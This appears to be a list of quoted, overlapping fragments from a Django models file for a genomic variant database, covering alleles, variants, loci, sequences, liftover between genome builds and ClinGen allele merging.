"variant_tuple = None if g_hgvs: variant_tuple = get_hgvs_variant_tuple(g_hgvs, genome_build) return conversion_tool, variant_tuple def",
"build being used by ClinGen) - but it's not likely. It's a bug",
"False def __str__(self): return f\"{self.allele} - {self.variant_id}({self.genome_build}/{self.conversion_tool})\" class VariantCollection(RelatedModelsPartitionModel): \"\"\" A set of",
"point to the same locus) There is only 1 Locus for a given",
"if va is None: raise ValueError(\"Allele contains no VariantAlleles at all! Cannot liftover\")",
"variant = models.ForeignKey(Variant, on_delete=CASCADE) class AlleleSource(models.Model): \"\"\" Provides a source of alleles for",
"<= end AND variant.end_position >= start \"\"\" annotation_kwargs = {\"longest_sequence\": Greatest(\"locus__ref__length\", \"alt__length\"), \"end_position\":",
"ref alt') class Sequence(models.Model): \"\"\" We want to guarantee seq is unique (so",
"return Allele.objects.filter(variantallele__variant__in=self.get_variants_qs()) def liftover_complete(self, genome_build: GenomeBuild): \"\"\" This is called at the end",
"True return False def __str__(self): return f\"{self.allele} - {self.variant_id}({self.genome_build}/{self.conversion_tool})\" class VariantCollection(RelatedModelsPartitionModel): \"\"\" A",
"and some unplaced scaffolds) - in those cases # we'll have the same",
"PARTITION_LABEL_TEXT = \"variant_collection\" name = models.TextField(null=True) count = models.IntegerField(null=True) status = models.CharField(max_length=1, choices=ProcessingStatus.choices,",
"VariantAllele(TimeStampedModel): \"\"\" It's possible for multiple variants from the same genome build to",
"raise ValueError(f'Could not find a variant in allele {self.id} for build {genome_build}') if",
"only_if_new=True) allele_validate_signal.send(sender=Allele, allele=self) @receiver(flag_collection_extra_info_signal, sender=FlagCollection) def get_extra_info(flag_infos: FlagInfos, user: User, **kwargs): # pylint:",
"q @staticmethod def annotate_variant_string(qs, name=\"variant_string\", path_to_variant=\"\"): \"\"\" Return a \"1:123321 G>C\" style string",
"self.allele if not allele: return [self] return Variant.objects.filter(variantallele__allele=allele) def get_canonical_transcript_annotation(self, genome_build) -> Optional['VariantTranscriptAnnotation']:",
"else: return f\"Allele {self.pk}\" def validate(self, liftover_complete=True): \"\"\" :param liftover_complete: If False does",
"\"\" if self.source_genome_build: source = f\"from {self.source_genome_build.name} \" return f\"Liftover {source}to {self.genome_build} via",
"import format_chrom from library.utils import md5sum_str from snpdb.models import Wiki from snpdb.models.flag_types import",
"InheritanceManager() def get_genome_build(self): return None def get_variants_qs(self): return Variant.objects.none() def get_allele_qs(self): return Allele.objects.filter(variantallele__variant__in=self.get_variants_qs())",
"standard [GATCN] (ie not special or reference) \"\"\" # locus.ref should always be",
"to write the source genome build VCF first Alleles must have already been",
"{\"longest_sequence\": Greatest(\"locus__ref__length\", \"alt__length\"), \"end_position\": F(\"locus__position\") + F(\"longest_sequence\")} q = Q(locus__contig=contig, locus__position__lte=end, end_position__gte=start) return",
"self.alt.length) @staticmethod def clean_variant_fields(chrom, position, ref, alt, want_chr): ref = ref.strip().upper() alt =",
"on_delete=CASCADE) conversion_tool = models.CharField(max_length=2, choices=AlleleConversionTool.choices) success = models.BooleanField(default=True) message = models.TextField(null=True) VariantCoordinate =",
"\"\"\" We want to guarantee seq is unique (so Locus/Variant can have unique",
"FlagCollection, flag_collection_extra_info_signal, FlagInfos from flags.models.models import FlagsMixin, FlagTypeContext from library.django_utils.django_partition import RelatedModelsPartitionModel from",
"Various contig errors all subclass from this pass if g_hgvs is None: if",
"only_if_new=True) if v38: self.close_open_flags_of_type(allele_flag_types.missing_38) else: self.flag_collection_safe.get_or_create_open_flag_of_type(flag_type=allele_flag_types.missing_38, only_if_new=True) allele_validate_signal.send(sender=Allele, allele=self) @receiver(flag_collection_extra_info_signal, sender=FlagCollection) def get_extra_info(flag_infos:",
"ClinGen or 2 loci in a genome build being represented by 1 loci",
"self.format_tuple(*self.as_tuple()) def __str__(self): return self.format_tuple(self.locus.contig.name, self.locus.position, self.locus.ref, self.alt) def get_absolute_url(self): # will show",
"{self.pk} ({self.name})\" class VariantCollectionRecord(models.Model): variant_collection = models.ForeignKey(VariantCollection, on_delete=DO_NOTHING) # handled via drop partition",
"-> 'Variant': vas = self.variant_alleles() va = None if genome_build: va = vas.filter(genome_build=genome_build).first()",
"if va: return va.variant raise ValueError(f'Could not find any variants in allele {self.id}')",
"\"\"\" return not re.match(r\"[^GATCN]\", self.seq) class Locus(models.Model): \"\"\" 1 per line in a",
"the same variant linked through different VariantAlleles (so it can't be 1-to-1) variant",
"(eg ClinGen AlleleRegistry) we can write the VCF in the desired genome build",
"installing the btree_gist extension (requires postgres Admin rights). Django 3 has ExclusionConstraint, Postgres",
"= models.ForeignKey(GenomeBuild, on_delete=CASCADE) def get_genome_build(self): return self.genome_build def get_variants_qs(self): return Variant.objects.filter(variantallele__in=self.get_variant_allele_ids()) def get_variant_allele_ids(self):",
"(due to our normalization not being the same as ClinGen or 2 loci",
"__str__(self): return self.format_tuple(self.locus.contig.name, self.locus.position, self.locus.ref, self.alt) def get_absolute_url(self): # will show allele if",
"= f\"Error performing {merge_log_message}: both have ClinGen Alleles!\" AlleleMergeLog.objects.create(old_allele=other_allele, new_allele=self, conversion_tool=conversion_tool, success=can_merge, message=merge_log_message)",
"Variants represent the different alleles at a locus Usually 2+ per line in",
"return Q(locus__contig__name__iexact=chrom) | Q(locus__contig__ucsc_name__iexact=chrom) @staticmethod def get_contigs_q(genome_build: GenomeBuild): \"\"\" Restrict to contigs in",
"'label': f'Allele {allele.id}' }, source_object=allele) class AlleleMergeLog(TimeStampedModel): \"\"\" Keep track of calls to",
"def get_variants_qs(self): return Variant.objects.filter(variantallele=self.variant_allele) @staticmethod def get_liftover_for_allele(allele, genome_build) -> Optional['Liftover']: \"\"\" Only works",
"merge into {self}\" other_clingen_allele = other_allele.clingen_allele if other_clingen_allele and self.clingen_allele: can_merge = False",
"new_allele=self, conversion_tool=conversion_tool, success=can_merge, message=merge_log_message) if can_merge: if other_clingen_allele: # Move across ClinGen Allele",
"not have been possible to retrieve in all builds, but at least one",
"given chrom/position/ref per database (handled via insertion queues) \"\"\" contig = models.ForeignKey(Contig, on_delete=CASCADE)",
"is one, otherwise go to variant page return reverse('view_allele', kwargs={\"pk\": self.id}) def flag_type_context(self)",
"None def get_variants_qs(self): return Variant.objects.none() def get_allele_qs(self): return Allele.objects.filter(variantallele__variant__in=self.get_variants_qs()) def liftover_complete(self, genome_build: GenomeBuild):",
"Variant alt sequence is standard [GATCN] (ie not special or reference) \"\"\" #",
"UploadPipeline \"\"\" user = models.ForeignKey(User, on_delete=CASCADE) allele_source = models.ForeignKey(AlleleSource, on_delete=CASCADE) conversion_tool = models.CharField(max_length=2,",
"find a variant in allele {self.id} for build {genome_build}') if not va: va",
"self.contig.name def __str__(self): return f\"{self.chrom}:{self.position} {self.ref}\" class Variant(models.Model): \"\"\" Variants represent the different",
"\"\"\" only contains G/A/T/C/N \"\"\" return not re.match(r\"[^GATCN]\", self.seq) class Locus(models.Model): \"\"\" 1",
"if not self.seq_md5_hash: self.seq_md5_hash = md5sum_str(self.seq) super().save(force_insert=force_insert, force_update=force_update, using=using, update_fields=update_fields) @staticmethod def abbreviate(s:",
"row) There is only 1 Variant for a given locus/alt per database (handled",
"Q(locus__contig=contig, locus__position__lte=end, end_position__gte=start) return annotation_kwargs, q @staticmethod def annotate_variant_string(qs, name=\"variant_string\", path_to_variant=\"\"): \"\"\" Return",
"QuerySet, F from django.db.models.deletion import CASCADE, DO_NOTHING from django.db.models.fields import TextField from django.db.models.functions",
"import TimeStampedModel from lazy import lazy from model_utils.managers import InheritanceManager from flags.models import",
"va.allele, va.genome_build, va.variant) va.delete() return can_merge @property def build_names(self) -> str: return \",",
"import FlagsMixin, FlagTypeContext from library.django_utils.django_partition import RelatedModelsPartitionModel from library.genomics import format_chrom from library.utils",
"import AlleleConversionTool, AlleleOrigin, ProcessingStatus from snpdb.models.models_genome import Contig, GenomeBuild, GenomeBuildContig LOCUS_PATTERN = re.compile(r\"^([^:]+):(\\d+)[,\\s]*([GATC]+)$\",",
"in alleles: flag_infos.set_extra_info(allele.flag_collection_id, { 'label': f'Allele {allele.id}' }, source_object=allele) class AlleleMergeLog(TimeStampedModel): \"\"\" Keep",
"is called at the end of a liftover pipeline (once per build) \"\"\"",
"constraint We only expect to store Alleles for a small fraction of Variants",
"used by ClinGen) - but it's not likely. It's a bug to have",
"return c_hgvs @property def start(self): return self.locus.position @property def end(self): return self.locus.position +",
"success=can_merge, message=merge_log_message) if can_merge: if other_clingen_allele: # Move across ClinGen Allele (may not",
"models.ForeignKey(Variant, null=True, on_delete=CASCADE) # Optional, if got a variant but invalid error_message =",
"for multiple variants from the same genome build to resolve to the same",
"def is_insertion(self) -> bool: return self.alt.seq != Variant.REFERENCE_ALT and self.locus.ref.length < self.alt.length @property",
"liftover\") dbsnp = DbSNP.get_for_variant(va.variant, va.genome_build.latest_variant_annotation_version) if dbsnp: g_hgvs = dbsnp.get_g_hgvs(genome_build, alt=va.variant.alt) conversion_tool =",
"@lazy def coordinate(self) -> VariantCoordinate: locus = self.locus contig = locus.contig return VariantCoordinate(chrom=contig.name,",
"self.clinicalcontext_set.values_list(\"name\", flat=True) other_allele.clinicalcontext_set.exclude(name__in=existing_allele_cc_names).update(allele=self) for va in other_allele.variantallele_set.all(): try: va.allele = self va.conversion_tool =",
"name def __format__(self, format_spec: str): if format_spec == 'CA' and (cligen_allele := self.clingen_allele):",
"= models.ForeignKey(GenomeBuild, on_delete=CASCADE) allele = models.ForeignKey(Allele, on_delete=CASCADE) origin = models.CharField(max_length=1, choices=AlleleOrigin.choices) conversion_tool =",
"variant page return reverse('view_allele_from_variant', kwargs={\"variant_id\": self.pk}) @lazy def allele(self) -> Optional[Allele]: va =",
"builds share contigs (eg GRCh37/38 share MT and some unplaced scaffolds) - in",
"indexes for constraints, and large TextFields give error of: \"index row requires x",
"server was down return self.error.get(\"errorType\") == ClinGenAllele.CLINGEN_ALLELE_SERVER_ERROR_TYPE return True return False def __str__(self):",
"Optional, Pattern, Tuple, Iterable, Set import django.dispatch from django.conf import settings from django.contrib.auth.models",
"the Variant object - instead do 1-to-1 \"\"\" # Some builds share contigs",
"show allele if there is one, otherwise go to variant page return reverse('view_allele_from_variant',",
"from snpdb.models.models_enums import AlleleConversionTool, AlleleOrigin, ProcessingStatus from snpdb.models.models_genome import Contig, GenomeBuild, GenomeBuildContig LOCUS_PATTERN",
"unique=True) length = models.IntegerField() def save(self, force_insert=False, force_update=False, using=None, update_fields=None): if not self.seq_md5_hash:",
"str: if abbreviate: ref = Sequence.abbreviate(ref) alt = Sequence.abbreviate(alt) return f\"{chrom}:{position} {ref}>{alt}\" @staticmethod",
"va.conversion_tool = conversion_tool va.save() except IntegrityError: logging.warning(\"VariantAllele exists with allele/build/variant of %s/%s/%s -",
"during liftover. Can be slow (API call) If you know a VariantAllele exists",
"don't want them on the Variant object - instead do 1-to-1 \"\"\" #",
"ClinGen Allele Registry, but sometimes that can fail. Linked against Variant with VariantAllele",
"via ClinGen Allele Registry, but sometimes that can fail. Linked against Variant with",
"can := self.varianttranscriptannotation_set.filter(version=vav, canonical=True).first(): return can if version := self.varianttranscriptannotation_set.filter(version=vav).first(): return version if",
"return {self.variant_collection_alias: FilteredRelation('variantcollectionrecord', condition=vcr_condition)} def get_q(self): if self.status != ProcessingStatus.SUCCESS: raise ValueError(f\"{self}: status",
"(\"locus\", \"alt\") @staticmethod def get_chrom_q(chrom): return Q(locus__contig__name__iexact=chrom) | Q(locus__contig__ucsc_name__iexact=chrom) @staticmethod def get_contigs_q(genome_build: GenomeBuild):",
"None @property def equivalent_variants(self) -> Iterable['Variant']: allele = self.allele if not allele: return",
"file (ref + >= 1 alts pointing to the same locus for the",
"is_abbreviated(self): return str(self) != self.full_string @lazy def full_string(self): \"\"\" No abbreviation \"\"\" return",
"collections import logging import re from typing import Optional, Pattern, Tuple, Iterable, Set",
"ValueError(f\"Attempt to merge {self} to itself!\") can_merge = True merge_log_message = f\"{other_allele} merge",
"our normalization not being the same as ClinGen or 2 loci in a",
"else: self.flag_collection_safe.get_or_create_open_flag_of_type(flag_type=allele_flag_types.missing_37, only_if_new=True) if v38: self.close_open_flags_of_type(allele_flag_types.missing_38) else: self.flag_collection_safe.get_or_create_open_flag_of_type(flag_type=allele_flag_types.missing_38, only_if_new=True) allele_validate_signal.send(sender=Allele, allele=self) @receiver(flag_collection_extra_info_signal, sender=FlagCollection)",
"existing_fc_cc_names = self.flag_collection.clinicalcontext_set.values_list(\"name\", flat=True) other_fc.clinicalcontext_set.exclude(name__in=existing_fc_cc_names).update(flag_collection=self.flag_collection) other_fc.classification_set.update(flag_collection=self.flag_collection) existing_allele_cc_names = self.clinicalcontext_set.values_list(\"name\", flat=True) other_allele.clinicalcontext_set.exclude(name__in=existing_allele_cc_names).update(allele=self) for va",
"self == other_allele: raise ValueError(f\"Attempt to merge {self} to itself!\") can_merge = True",
"AlleleMergeLog(TimeStampedModel): \"\"\" Keep track of calls to Allele.merge() \"\"\" old_allele = models.ForeignKey(Allele, related_name=\"old_allele_merge\",",
"def get_genome_build(self): return self.variant_allele.genome_build def get_variants_qs(self): return Variant.objects.filter(variantallele=self.variant_allele) @staticmethod def get_liftover_for_allele(allele, genome_build) ->",
"return Variant.objects.filter(pk__in=self.variant_alleles().values_list('variant', flat=True)) def variant_for_build(self, genome_build: GenomeBuild, best_attempt=True) -> 'Variant': vas = self.variant_alleles()",
"FlagTypeContext from library.django_utils.django_partition import RelatedModelsPartitionModel from library.genomics import format_chrom from library.utils import md5sum_str",
"best_attempt: raise ValueError(f'Could not find a variant in allele {self.id} for build {genome_build}')",
"that can fail. Linked against Variant with VariantAllele below \"\"\" clingen_allele = models.OneToOneField(ClinGenAllele,",
"with allele/build/variant of %s/%s/%s - deleting this one\", va.allele, va.genome_build, va.variant) va.delete() return",
"but invalid error_message = models.TextField() class Meta: unique_together = ('liftover', 'allele') def __str__(self):",
"\"1:123321 G>C\" style string in a query \"\"\" kwargs = {name: Concat(f\"{path_to_variant}locus__contig__name\", V(\":\"),",
"Q(locus__contig__genomebuildcontig__genome_build=genome_build) @staticmethod def get_no_reference_q(): return ~Q(alt__seq=Variant.REFERENCE_ALT) @staticmethod def get_overlap_annotate_and_q(contig, start, end): \"\"\" Query",
"from django.db import models, IntegrityError from django.db.models import Value as V, QuerySet, F",
"on_delete=CASCADE) class AlleleSource(models.Model): \"\"\" Provides a source of alleles for liftover pipelines. \"\"\"",
"get_canonical_c_hgvs(self, genome_build): c_hgvs = None if cta := self.get_canonical_transcript_annotation(genome_build): c_hgvs = cta.hgvs_c return",
"involves reading through a VCF where ID is set to Allele.pk and then",
"= m.groups() chrom, position, ref, alt = Variant.clean_variant_fields(chrom, position, ref, alt, want_chr=genome_build.reference_fasta_has_chr) contig",
"= models.TextField(null=True) count = models.IntegerField(null=True) status = models.CharField(max_length=1, choices=ProcessingStatus.choices, default=ProcessingStatus.CREATED) @property def variant_collection_alias(self):",
"@staticmethod def annotate_variant_string(qs, name=\"variant_string\", path_to_variant=\"\"): \"\"\" Return a \"1:123321 G>C\" style string in",
"return reverse('view_allele_from_variant', kwargs={\"variant_id\": self.pk}) @lazy def allele(self) -> Optional[Allele]: va = VariantAllele.objects.filter(variant=self).first() if",
"have unique constraints) Postgres by default uses indexes for constraints, and large TextFields",
"\"alt__seq\"] return Variant.objects.get(locus__contig__genomebuildcontig__genome_build=genome_build, **dict(zip(params, variant_tuple))) @lazy def genome_builds(self) -> Set['GenomeBuild']: gbc_qs = GenomeBuildContig.objects.filter(genome_build__in=GenomeBuild.builds_with_annotation(),",
"alt = Variant.REFERENCE_ALT chrom = format_chrom(chrom, want_chr) return chrom, position, ref, alt class",
"The VCF (in genome_build build) is set in UploadedFile for the UploadPipeline \"\"\"",
"c_hgvs @property def start(self): return self.locus.position @property def end(self): return self.locus.position + max(self.locus.ref.length,",
"Wiki from snpdb.models.flag_types import allele_flag_types from snpdb.models.models_clingen_allele import ClinGenAllele from snpdb.models.models_enums import AlleleConversionTool,",
"same locus for the row) There is only 1 Variant for a given",
"Liftover(TimeStampedModel): \"\"\" Liftover pipeline involves reading through a VCF where ID is set",
"return error def variant_alleles(self): return self.variantallele_set.order_by(\"genome_build__name\") @lazy def grch37(self) -> Optional['Variant']: try: return",
"def __str__(self): return self.abbreviate(self.seq) @staticmethod def get_pk_by_seq(q=None): qs = Sequence.objects.all() if q: qs",
"So don't want them on the Variant object - instead do 1-to-1 \"\"\"",
"genome build being represented by 1 loci in the build being used by",
"disable=unused-argument alleles = Allele.objects.filter(flag_collection__in=flag_infos.ids) allele: Allele for allele in alleles: flag_infos.set_extra_info(allele.flag_collection_id, { 'label':",
"ref, alt) return variant_tuple @staticmethod def get_from_string(variant_string: str, genome_build: GenomeBuild, regex_pattern=VARIANT_PATTERN) -> Optional['Variant']:",
"choices=ProcessingStatus.choices, default=ProcessingStatus.CREATED) @property def variant_collection_alias(self): return f\"variantcollection_{self.pk}\" def get_annotation_kwargs(self): vcr_condition = Q(variantcollectionrecord__variant_collection=self) return",
"variant_tuple = variant_allele.variant.as_tuple() return conversion_tool, variant_tuple conversion_tool = None g_hgvs = None if",
"as a cached result \"\"\" RECORDS_BASE_TABLE_NAMES = [\"snpdb_variantcollectionrecord\"] RECORDS_FK_FIELD_TO_THIS_MODEL = \"variant_collection_id\" PARTITION_LABEL_TEXT =",
"def annotate_variant_string(qs, name=\"variant_string\", path_to_variant=\"\"): \"\"\" Return a \"1:123321 G>C\" style string in a",
"so it'll work) other_allele.clingen_allele = None other_allele.save() self.clingen_allele = other_clingen_allele self.save() if other_fc",
"unique constraints) Postgres by default uses indexes for constraints, and large TextFields give",
"@staticmethod def format_tuple(chrom, position, ref, alt, abbreviate=False) -> str: if abbreviate: ref =",
"is only 1 Variant for a given locus/alt per database (handled via insertion",
"get_absolute_url(self): # will show allele if there is one, otherwise go to variant",
"self.locus.ref.seq, self.alt.seq def is_abbreviated(self): return str(self) != self.full_string @lazy def full_string(self): \"\"\" No",
"from django.db.models.deletion import CASCADE, DO_NOTHING from django.db.models.fields import TextField from django.db.models.functions import Greatest",
"VariantCoordinate(contig.name, int(position), ref, alt) return variant_tuple @staticmethod def get_from_string(variant_string: str, genome_build: GenomeBuild, regex_pattern=VARIANT_PATTERN)",
"G>C\" style string in a query \"\"\" kwargs = {name: Concat(f\"{path_to_variant}locus__contig__name\", V(\":\"), f\"{path_to_variant}locus__position\",",
"self.allele.clingen_allele is None: if self.error: # Retry if server was down return self.error.get(\"errorType\")",
"variants - usually used as a cached result \"\"\" RECORDS_BASE_TABLE_NAMES = [\"snpdb_variantcollectionrecord\"] RECORDS_FK_FIELD_TO_THIS_MODEL",
"or alt == '.' @property def is_reference(self) -> bool: return self.alt.seq == self.REFERENCE_ALT",
"None if genome_build: va = vas.filter(genome_build=genome_build).first() if not va and not best_attempt: raise",
"self.locus.ref.length > self.alt.length @property def can_have_clingen_allele(self) -> bool: return self.is_standard_variant or self.is_reference @property",
"liftover_complete=True): \"\"\" :param liftover_complete: If False does not check for missing representations \"\"\"",
"alleles point to the same locus) There is only 1 Locus for a",
"on_delete=CASCADE) conversion_tool = models.CharField(max_length=2, choices=AlleleConversionTool.choices) source_vcf = models.TextField(null=True) source_genome_build = models.ForeignKey(GenomeBuild, null=True, on_delete=CASCADE,",
"= self.flag_collection.clinicalcontext_set.values_list(\"name\", flat=True) other_fc.clinicalcontext_set.exclude(name__in=existing_fc_cc_names).update(flag_collection=self.flag_collection) other_fc.classification_set.update(flag_collection=self.flag_collection) existing_allele_cc_names = self.clinicalcontext_set.values_list(\"name\", flat=True) other_allele.clinicalcontext_set.exclude(name__in=existing_allele_cc_names).update(allele=self) for va in",
"below \"\"\" clingen_allele = models.OneToOneField(ClinGenAllele, null=True, on_delete=CASCADE) def get_absolute_url(self): # will show allele",
"so we can add that unique_together constraint We only expect to store Alleles",
"Tuple[str, 'VariantCoordinate']: \"\"\" Used by to write VCF coordinates during liftover. Can be",
"in genome_build.chrom_contig_mappings.values()) for variant_allele in self.variantallele_set.all(): if variant_allele.variant.locus.contig_id in genome_build_contigs: conversion_tool = AlleleConversionTool.SAME_CONTIG",
"in a genome build being represented by 1 loci in the build being",
"typing import Optional, Pattern, Tuple, Iterable, Set import django.dispatch from django.conf import settings",
"alt == '.' @property def is_reference(self) -> bool: return self.alt.seq == self.REFERENCE_ALT @property",
"Alleles!\" AlleleMergeLog.objects.create(old_allele=other_allele, new_allele=self, conversion_tool=conversion_tool, success=can_merge, message=merge_log_message) if can_merge: if other_clingen_allele: # Move across",
"other_allele.clingen_allele if other_clingen_allele and self.clingen_allele: can_merge = False merge_log_message = f\"Error performing {merge_log_message}:",
"VARIANT_PATTERN = re.compile(r\"^([^:]+):(\\d+)[,\\s]*([GATC]+)>(=|[GATC]+)$\", re.IGNORECASE) allele_validate_signal = django.dispatch.Signal(providing_args=[\"allele\"]) class Allele(FlagsMixin, models.Model): \"\"\" Genome build",
"will show allele if there is one, otherwise go to variant page return",
"position = models.IntegerField(db_index=True) ref = models.ForeignKey(Sequence, on_delete=CASCADE) class Meta: unique_together = (\"contig\", \"position\",",
"chrom/position/ref per database (handled via insertion queues) \"\"\" contig = models.ForeignKey(Contig, on_delete=CASCADE) position",
"try: return self.variant_for_build(genome_build=GenomeBuild.grch37(), best_attempt=False) except ValueError: return None @lazy def grch38(self) -> Optional['Variant']:",
"VariantWiki(Wiki): variant = models.OneToOneField(Variant, on_delete=CASCADE) class VariantAllele(TimeStampedModel): \"\"\" It's possible for multiple variants",
"allele = self.allele if not allele: return [self] return Variant.objects.filter(variantallele__allele=allele) def get_canonical_transcript_annotation(self, genome_build)",
"to the same allele (due to our normalization not being the same as",
"Optional['Liftover']: \"\"\" Only works if liftover was done via VariantAlleleSource \"\"\" allele_sources_qs =",
"for same change point to same allele This is generally done via ClinGen",
"genome_build) except Variant.DoesNotExist: return None @staticmethod def get_from_tuple(variant_tuple: VariantCoordinate, genome_build: GenomeBuild) -> 'Variant':",
"except IntegrityError: logging.warning(\"VariantAllele exists with allele/build/variant of %s/%s/%s - deleting this one\", va.allele,",
"want to guarantee seq is unique (so Locus/Variant can have unique constraints) Postgres",
"where ID is set to Allele.pk and then creating VariantAllele entries for the",
"contrib has BtreeGistExtension to add via migration \"\"\" seq = models.TextField() seq_md5_hash =",
"requires installing the btree_gist extension (requires postgres Admin rights). Django 3 has ExclusionConstraint,",
"= Q(locus__contig=contig, locus__position__lte=end, end_position__gte=start) return annotation_kwargs, q @staticmethod def annotate_variant_string(qs, name=\"variant_string\", path_to_variant=\"\"): \"\"\"",
"def abbreviate(s: str, max_length: int = 20): if len(s) > max_length: s =",
"= VariantAlleleSource.objects.filter(variant_allele__allele=allele) return Liftover.objects.filter(allele_source__in=allele_sources_qs, genome_build=genome_build).first() class VariantAlleleCollectionSource(AlleleSource): genome_build = models.ForeignKey(GenomeBuild, on_delete=CASCADE) def get_genome_build(self):",
"possible for multiple variants from the same genome build to resolve to the",
"via VariantAlleleSource \"\"\" allele_sources_qs = VariantAlleleSource.objects.filter(variant_allele__allele=allele) return Liftover.objects.filter(allele_source__in=allele_sources_qs, genome_build=genome_build).first() class VariantAlleleCollectionSource(AlleleSource): genome_build =",
"DbSNP from genes.hgvs import get_hgvs_variant_tuple # Check if the other build shares existing",
"(may not have been possible to retrieve in all builds, but at least",
"is None: if settings.LIFTOVER_DBSNP_ENABLED: va = self.variantallele_set.all().first() if va is None: raise ValueError(\"Allele",
"from snpdb.models.models_clingen_allele import ClinGenAllele from snpdb.models.models_enums import AlleleConversionTool, AlleleOrigin, ProcessingStatus from snpdb.models.models_genome import",
"def grch38(self) -> Optional['Variant']: try: return self.variant_for_build(genome_build=GenomeBuild.grch38(), best_attempt=False) except ValueError: return None @lazy",
"retrieve them The VCF (in genome_build build) is set in UploadedFile for the",
"on_delete=CASCADE) origin = models.CharField(max_length=1, choices=AlleleOrigin.choices) conversion_tool = models.CharField(max_length=2, choices=AlleleConversionTool.choices) error = models.JSONField(null=True) #",
"except ValueError: return None @lazy def grch38(self) -> Optional['Variant']: try: return self.variant_for_build(genome_build=GenomeBuild.grch38(), best_attempt=False)",
"= alt.strip().upper() if Variant.is_ref_alt_reference(ref, alt): alt = Variant.REFERENCE_ALT chrom = format_chrom(chrom, want_chr) return",
"# Move across ClinGen Allele (may not have been possible to retrieve in",
"= models.ForeignKey(Allele, related_name=\"old_allele_merge\", on_delete=CASCADE) new_allele = models.ForeignKey(Allele, related_name=\"new_allele_merge\", on_delete=CASCADE) conversion_tool = models.CharField(max_length=2, choices=AlleleConversionTool.choices)",
"Locus(models.Model): \"\"\" 1 per line in a VCF file (multiple Variants with different",
"same 3 variant/build/allele so we can add that unique_together constraint We only expect",
"Can be slow (API call) If you know a VariantAllele exists for your",
"if there is one, otherwise go to variant page return reverse('view_allele_from_variant', kwargs={\"variant_id\": self.pk})",
"update_fields=None): if not self.seq_md5_hash: self.seq_md5_hash = md5sum_str(self.seq) super().save(force_insert=force_insert, force_update=force_update, using=using, update_fields=update_fields) @staticmethod def",
"annotation_kwargs = {\"longest_sequence\": Greatest(\"locus__ref__length\", \"alt__length\"), \"end_position\": F(\"locus__position\") + F(\"longest_sequence\")} q = Q(locus__contig=contig, locus__position__lte=end,",
"ValueError(f\"{self}: status {self.get_status_display()} != SUCCESS\") return Q(**{f\"{self.variant_collection_alias}__isnull\": False}) def __str__(self): return f\"VariantCollection: {self.pk}",
"if self == other_allele: raise ValueError(f\"Attempt to merge {self} to itself!\") can_merge =",
"used as a cached result \"\"\" RECORDS_BASE_TABLE_NAMES = [\"snpdb_variantcollectionrecord\"] RECORDS_FK_FIELD_TO_THIS_MODEL = \"variant_collection_id\" PARTITION_LABEL_TEXT",
"store Alleles for a small fraction of Variants So don't want them on",
"f\"Liftover {source}to {self.genome_build} via {self.get_conversion_tool_display()}\" class LiftoverError(models.Model): liftover = models.ForeignKey(Liftover, on_delete=CASCADE) allele =",
"the end of a liftover pipeline (once per build) \"\"\" pass class VariantAlleleSource(AlleleSource):",
"self.clingen_allele: can_merge = False merge_log_message = f\"Error performing {merge_log_message}: both have ClinGen Alleles!\"",
"{ref}>{alt}\" @staticmethod def get_tuple_from_string(variant_string: str, genome_build: GenomeBuild, regex_pattern: Pattern[str] = VARIANT_PATTERN) -> VariantCoordinate:",
"models.ForeignKey(GenomeBuild, on_delete=CASCADE) allele = models.ForeignKey(Allele, on_delete=CASCADE) origin = models.CharField(max_length=1, choices=AlleleOrigin.choices) conversion_tool = models.CharField(max_length=2,",
"per line in a VCF file (ref + >= 1 alts pointing to",
"+ max(self.locus.ref.length, self.alt.length) @staticmethod def clean_variant_fields(chrom, position, ref, alt, want_chr): ref = ref.strip().upper()",
"track of calls to Allele.merge() \"\"\" old_allele = models.ForeignKey(Allele, related_name=\"old_allele_merge\", on_delete=CASCADE) new_allele =",
"= models.ForeignKey(VariantAllele, on_delete=CASCADE) def get_genome_build(self): return self.variant_allele.genome_build def get_variants_qs(self): return Variant.objects.filter(variantallele=self.variant_allele) @staticmethod def",
"have been possible to retrieve in all builds, but at least one #",
"allele=self) @receiver(flag_collection_extra_info_signal, sender=FlagCollection) def get_extra_info(flag_infos: FlagInfos, user: User, **kwargs): # pylint: disable=unused-argument alleles",
"reverse('view_allele', kwargs={\"pk\": self.id}) def flag_type_context(self) -> FlagTypeContext: return FlagTypeContext.objects.get(pk=\"allele\") @lazy def clingen_error(self): error",
"contig = locus.contig return VariantCoordinate(chrom=contig.name, pos=locus.position, ref=locus.ref.seq, alt=self.alt.seq) @staticmethod def is_ref_alt_reference(ref, alt): return",
"ref=locus.ref.seq, alt=self.alt.seq) @staticmethod def is_ref_alt_reference(ref, alt): return ref == alt or alt ==",
"= get_hgvs_variant_tuple(g_hgvs, genome_build) return conversion_tool, variant_tuple def merge(self, conversion_tool, other_allele: \"Allele\") -> bool:",
"performing {merge_log_message}: both have ClinGen Alleles!\" AlleleMergeLog.objects.create(old_allele=other_allele, new_allele=self, conversion_tool=conversion_tool, success=can_merge, message=merge_log_message) if can_merge:",
"has BtreeGistExtension to add via migration \"\"\" seq = models.TextField() seq_md5_hash = models.CharField(max_length=32,",
"self.error.get(\"errorType\") == ClinGenAllele.CLINGEN_ALLELE_SERVER_ERROR_TYPE return True return False def __str__(self): return f\"{self.allele} - {self.variant_id}({self.genome_build}/{self.conversion_tool})\"",
"RelatedModelsPartitionModel from library.genomics import format_chrom from library.utils import md5sum_str from snpdb.models import Wiki",
"links there, and can't have another, so it'll work) other_allele.clingen_allele = None other_allele.save()",
"va.genome_build.latest_variant_annotation_version) if dbsnp: g_hgvs = dbsnp.get_g_hgvs(genome_build, alt=va.variant.alt) conversion_tool = AlleleConversionTool.DBSNP variant_tuple = None",
"genome_builds(self) -> Set['GenomeBuild']: gbc_qs = GenomeBuildContig.objects.filter(genome_build__in=GenomeBuild.builds_with_annotation(), contig__locus__variant=self) return {gbc.genome_build for gbc in gbc_qs}",
"least one # links there, and can't have another, so it'll work) other_allele.clingen_allele",
"alt): return ref == alt or alt == '.' @property def is_reference(self) ->",
"on_delete=CASCADE) # Optional, if got a variant but invalid error_message = models.TextField() class",
"va: va = vas.first() if va: return va.variant raise ValueError(f'Could not find any",
"def get_allele_qs(self) -> QuerySet: return self.get_allele_source().get_allele_qs() def complete(self): self.get_allele_source().liftover_complete(genome_build=self.genome_build) def __str__(self): source =",
"position, ref, alt, want_chr): ref = ref.strip().upper() alt = alt.strip().upper() if Variant.is_ref_alt_reference(ref, alt):",
"conversion_tool, other_allele: \"Allele\") -> bool: \"\"\" Merge other_allele into this allele \"\"\" if",
"always be standard... return self.alt.is_standard_sequence() @property def is_indel(self) -> bool: return self.alt.seq !=",
